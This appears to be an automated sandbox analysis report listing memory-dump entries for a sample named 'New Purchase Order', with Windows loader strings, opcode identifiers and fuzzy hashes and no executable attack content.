                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2986994758
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          • API String ID: 48624451-232158463
                                                          Strings
                                                          • LdrResSearchResource Enter, xrefs: 016FAA13
                                                          • LdrResSearchResource Exit, xrefs: 016FAA25
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                          • API String ID: 0-4066393604
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MUI
                                                          • API String ID: 0-17815947
                                                          Strings
                                                          • kLsE, xrefs: 016F0540
                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 016F063D
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                          • API String ID: 0-2547482624
                                                          Strings
                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 016FA2FB
                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 016FA309
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                          • API String ID: 0-2876891731
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Cleanup Group$Threadpool!
                                                          • API String ID: 2994545307-4008356553
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .mui
                                                          • API String ID: 0-1199573805
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 102e366e92376a679e516fa5104f401d29212aabdb01576806c20f77507476b2
                                                          • Instruction ID: c09fc8212ecdad2d173f80de9ba4a363d480b24186445200928d322af53e78ad
                                                          • Opcode Fuzzy Hash: 102e366e92376a679e516fa5104f401d29212aabdb01576806c20f77507476b2
                                                          • Instruction Fuzzy Hash: 73310731A40719ABEB22EF69C854BEEFBF9EF45704F144068F941AB282D775E805CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          • API String ID: 0-215506332
                                                          • Opcode ID: 782341ccd2518bbee062603c86161dffaff197b3fc9167a060ca22a838599032
                                                          • Instruction ID: dde37586112a1e6b0c9fca1a6785f0216a4c8ad833bd15a65e9af7aefb713cb7
                                                          • Opcode Fuzzy Hash: 782341ccd2518bbee062603c86161dffaff197b3fc9167a060ca22a838599032
                                                          • Instruction Fuzzy Hash: 52310536900515AFEB17DB58C845E7FFB78EB80710F014169AD49A7291D7309E04EBE0
                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0177895E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          • API String ID: 0-702105204
                                                          • Opcode ID: e99101d8c1aff9dda7aa4f856f29c9ab7c9cc1889173bfbca4cd2e8f6f835bf5
                                                          • Instruction ID: 55bcab1eca41180fb57f3564e7585fa39aa9de30c75dbff81aa3d613fc6c136c
                                                          • Opcode Fuzzy Hash: e99101d8c1aff9dda7aa4f856f29c9ab7c9cc1889173bfbca4cd2e8f6f835bf5
                                                          • Instruction Fuzzy Hash: 9D0120763052059BDF205B55DC8CE56FFE9EF85268F04002CF7810E551CB206C40CB97
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f90ac15501b8aeb3bda872f936592ae7c09e36e480e6b393099563dbdef5c4c9
                                                          • Instruction ID: 99539218e9887452791c9a0d035ab6e4784d9356c5ec0919ff6d74f6561d9afc
                                                          • Opcode Fuzzy Hash: f90ac15501b8aeb3bda872f936592ae7c09e36e480e6b393099563dbdef5c4c9
                                                          • Instruction Fuzzy Hash: 6371AB75904629DBCB268F59C8907BEFBF5FF5C710F14829AE942AB390D7749840CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 479c6317a1fd12e811e4dd6c0e23305527d8c9a10b590f9ef63ae15d88ebb294
                                                          • Instruction ID: 3b61d68045ce491bd132483da672596d8e13ecc4e0f388f0fc9588940fe95e52
                                                          • Opcode Fuzzy Hash: 479c6317a1fd12e811e4dd6c0e23305527d8c9a10b590f9ef63ae15d88ebb294
                                                          • Instruction Fuzzy Hash: 8171C770900205EFDB20CF59D954A5AFBF8FFE8710F88825AF6019B259D7739A80CB55
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfd78dbe5ec09c1193136b13ef6eaaa494e647339c8d6ed59676be144e9b52a4
                                                          • Instruction ID: 03f542060c9caa5df7501597c796d61209f53051a7e85642fe62f0750ed69324
                                                          • Opcode Fuzzy Hash: cfd78dbe5ec09c1193136b13ef6eaaa494e647339c8d6ed59676be144e9b52a4
                                                          • Instruction Fuzzy Hash: 9171CE32604242CFD312DF28C888B2AF7E5FF84310F0485AAE9998B796DB74D845CB91
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction ID: 2fef8f3d44c6c4bc3a141df8cccde06bf5ab7c904bbb4eb19db3487572a49d20
                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction Fuzzy Hash: 34715C71A00619EFDB11DFA9C988EAEFBB9FF48700F104569E505EB294DB34EA41CB50
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9a5a4fc139310e8cd686503d8c2ed25ee7ca97a63366a79f0f3931e1c88f10e
                                                          • Instruction ID: 56ac4f7d47f54abea4448c54ec6318e77128383d1c0eac46ea99db8b21dab59a
                                                          • Opcode Fuzzy Hash: b9a5a4fc139310e8cd686503d8c2ed25ee7ca97a63366a79f0f3931e1c88f10e
                                                          • Instruction Fuzzy Hash: CD71C232280B01BFE732EF18C849F5AFBE6EB44724F144918F65A8B6A1D775E944CB50
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c755a6632b3fe3032261bc32ae816edc99958700fc1875eaef1e4bbbffc81a41
                                                          • Instruction ID: c4b57928ad4e56c587509d55281c69cbaa82ddeb38fab6834fda0cb9520f077e
                                                          • Opcode Fuzzy Hash: c755a6632b3fe3032261bc32ae816edc99958700fc1875eaef1e4bbbffc81a41
                                                          • Instruction Fuzzy Hash: 8C81B172A08309CFDB24CF98C884B6DB7F5BF48720F1A416DDA01AB286C7B49D41CB94
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23bfac25a119c36b38348266586887ac04a9910c8be91deaba1e8b1c45ec1ba3
                                                          • Instruction ID: d8325f6fffc2fa3b84951a70714079da437ad782ce8d3fc3067758d94d7b872d
                                                          • Opcode Fuzzy Hash: 23bfac25a119c36b38348266586887ac04a9910c8be91deaba1e8b1c45ec1ba3
                                                          • Instruction Fuzzy Hash: 74712971E0020AAFDB16DF94C845FEEFBB8FB04750F10426DE621A7291E774AA05CB91
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 102ff1c4502cbd5ae6da78273634354ab7bd4d6a562a81e84ca7e8e132dc290c
                                                          • Instruction ID: 794fe7f046bacfb2eb7999f83634447c76735cf255ada5bb477be0af529a2e49
                                                          • Opcode Fuzzy Hash: 102ff1c4502cbd5ae6da78273634354ab7bd4d6a562a81e84ca7e8e132dc290c
                                                          • Instruction Fuzzy Hash: 4951A272504712AFD722DF68C848E5BFBE8EBC9750F414A29BA41DB150D770ED09CBA2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cbee9a303918227a9ede0656fc671e8aaeef1c204c39698d6970ebda4b83ef28
                                                          • Instruction ID: c57d8e2c58c1868a9e6b9888e09aa49d4d24b28b988c98bc0ee1973f8e3d7b75
                                                          • Opcode Fuzzy Hash: cbee9a303918227a9ede0656fc671e8aaeef1c204c39698d6970ebda4b83ef28
                                                          • Instruction Fuzzy Hash: 5051F070900709DFDB21CF6AD884BABFBF8BF95710F10461ED292976A1C7B0A549CB91
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df35694bb80a5fcd44e4913bf5223f6329976d81dc17be81533e15146f74fadb
                                                          • Instruction ID: 937efee36a08dbec4c396921445746e9e98b8a1c8de778a53f6905f2be1a8a63
                                                          • Opcode Fuzzy Hash: df35694bb80a5fcd44e4913bf5223f6329976d81dc17be81533e15146f74fadb
                                                          • Instruction Fuzzy Hash: F9515C71200A15DFCB22EF69C984EAAF3FDFF14644F50086AE652D72A1DB34E941CB50
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa0f840c911ad84f601cec0d7d3394b1c2aebeaabcbd3ec6ca4c14b8cf04f7a6
                                                          • Instruction ID: 28e008b71ed94ae29e06b3adfbd0ae0959c6ab40621b28b74f39326aa0ffccd5
                                                          • Opcode Fuzzy Hash: aa0f840c911ad84f601cec0d7d3394b1c2aebeaabcbd3ec6ca4c14b8cf04f7a6
                                                          • Instruction Fuzzy Hash: 7F517A716083029FDB54DF29D981A6BFBE5BFC8218F444A2DF586D7250D730D90ACB52
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction ID: d8f6b4013909a1fb3e6e7f4e7998abb3e4d3fa5541b3098355beac1bcc6cecd0
                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction Fuzzy Hash: 0C516C71E0021AABDF15DF98C444BFEFBB5EF49754F044069EA02AB248D774DA44CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction ID: 8e37dd960d40147fbe6972f8b86e40923a64c3f60f79b55ea53c2911411f9b80
                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction Fuzzy Hash: 9B51A771D0020AEFEF219A94C884FBEFF79AB44364F1546E5D612671A1DB309E448BA0
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fecacea024f857f772f69aebff20341a7b5deee952fd968bf2ff78b55538b41
                                                          • Instruction ID: 626763663f1d40802781a5ea21abf40f411b5e542059a045d4e22a2f4054b73e
                                                          • Opcode Fuzzy Hash: 2fecacea024f857f772f69aebff20341a7b5deee952fd968bf2ff78b55538b41
                                                          • Instruction Fuzzy Hash: E841F8B07056019BDB29DB2DC8D8BFBFB9EEF94220F048259F95987384DB30D841C692
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 416a48dac6e43d8258dc1e11e7372fe1877f589c5266ff032d5bfea4299fcdac
                                                          • Instruction ID: 3acefe175937bf57ed2b22a984dc5a8e17b444732c946913d98435f8bee4762b
                                                          • Opcode Fuzzy Hash: 416a48dac6e43d8258dc1e11e7372fe1877f589c5266ff032d5bfea4299fcdac
                                                          • Instruction Fuzzy Hash: F151787290021ADFCF22DFA8C9809AEFBF9FB58328F158519E546A7305D730AD41CB90
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7cc4fb948ca6399215f93cb058aa0a4db0df9e2477f8e8693e0aea8fd75d3ecc
                                                          • Instruction ID: da6797c42dc866888d8b60a1cf49508c8fbf1cb549a71edf278e9d365fdc98d5
                                                          • Opcode Fuzzy Hash: 7cc4fb948ca6399215f93cb058aa0a4db0df9e2477f8e8693e0aea8fd75d3ecc
                                                          • Instruction Fuzzy Hash: BA4128726443229BCF25EF69A884B6AF7E9EB58718F41407CFE029F246D771DC018790
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction ID: 2d3facd168060947f3853be71f40efa27c9d1a4555b447bba86f5098b47817da
                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction Fuzzy Hash: E541C672A007169FD725DF28C9C4BAAF7E9FF80210B05466EE95287645EB31ED04C790
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17e12595cf17584f8f4d8ddf659f575aeb5783135d22114cd4a558b737708719
                                                          • Instruction ID: d6cfab5d19923834a72e380643980e1cee7faaa33e574cc9459a5887092391d2
                                                          • Opcode Fuzzy Hash: 17e12595cf17584f8f4d8ddf659f575aeb5783135d22114cd4a558b737708719
                                                          • Instruction Fuzzy Hash: 1141AA369002299BDB14DF98C440AEEFBB4BF59710F15826EF815E7241D735AD42CBB4
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abd5dbc3a7da3898ae0f81226aa2edbea106e3a8f0a31f340d4321cb771e59f3
                                                          • Instruction ID: 1e0ca487aa09ce7712ef7267c4241723b5cc8e8e83ad4f0f8c112530d9e11f96
                                                          • Opcode Fuzzy Hash: abd5dbc3a7da3898ae0f81226aa2edbea106e3a8f0a31f340d4321cb771e59f3
                                                          • Instruction Fuzzy Hash: 5A41B3726043029FD726DF2CC884A5BF7E5FF88324F144869E957C725ADB71E8848B50
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction ID: d4670eca3ba573ec7d5517c30201af53bd4bcb1ad489b2e57c48eb1d8b349a7f
                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction Fuzzy Hash: 1A515A75A00215CFCB15CF9DC980AAEFBB6FF84710F2881A9D915A7355D770AE82CB90
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f06264457af862767d9061f798c959c1c4256762f4632320852e35d59066bb0
                                                          • Instruction ID: 2e4b5c2341b34ab8bc4bd12860b5ce7a104530dfe7fe714cc77cb8482a123a97
                                                          • Opcode Fuzzy Hash: 0f06264457af862767d9061f798c959c1c4256762f4632320852e35d59066bb0
                                                          • Instruction Fuzzy Hash: A351E470940256DBDB26CB28CC18BE9FBF1FF15314F1482A9E629972C2D7749981CF80
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b30f1264be27fbc678121b561c1ff3d5ed35a5a4db27ae849148f645a5f542f8
                                                          • Instruction ID: 1653b36b0a318a9247392af6237791cb48b48ab975d5dfed8045b2111da90c0c
                                                          • Opcode Fuzzy Hash: b30f1264be27fbc678121b561c1ff3d5ed35a5a4db27ae849148f645a5f542f8
                                                          • Instruction Fuzzy Hash: 1C419131A00329DFDB21DF68CD44BEAB7B5BF45750F0100A9EA48AB246DB749E81CF91
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction ID: 3942a70e7fb41e2db1461fb89c964a7195ea9d35ac595f8cd1984bde370e315a
                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction Fuzzy Hash: C6417F75B10206ABDB15DA99CCC4BEFFBBEAF88704F144069E914A7346D770DD0087A1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 636bf21a669518501c70cef8400f9e7a7913bf4d9f8dddaf3295d5b0ad42302c
                                                          • Instruction ID: 29d492a25378983bc45af05025147bf9336f5a4c8934013adf09e896babccb4d
                                                          • Opcode Fuzzy Hash: 636bf21a669518501c70cef8400f9e7a7913bf4d9f8dddaf3295d5b0ad42302c
                                                          • Instruction Fuzzy Hash: C141C271600702DFE725CF28C884A22F7FAFF49314B109A6DE65787A52E730E846CB90
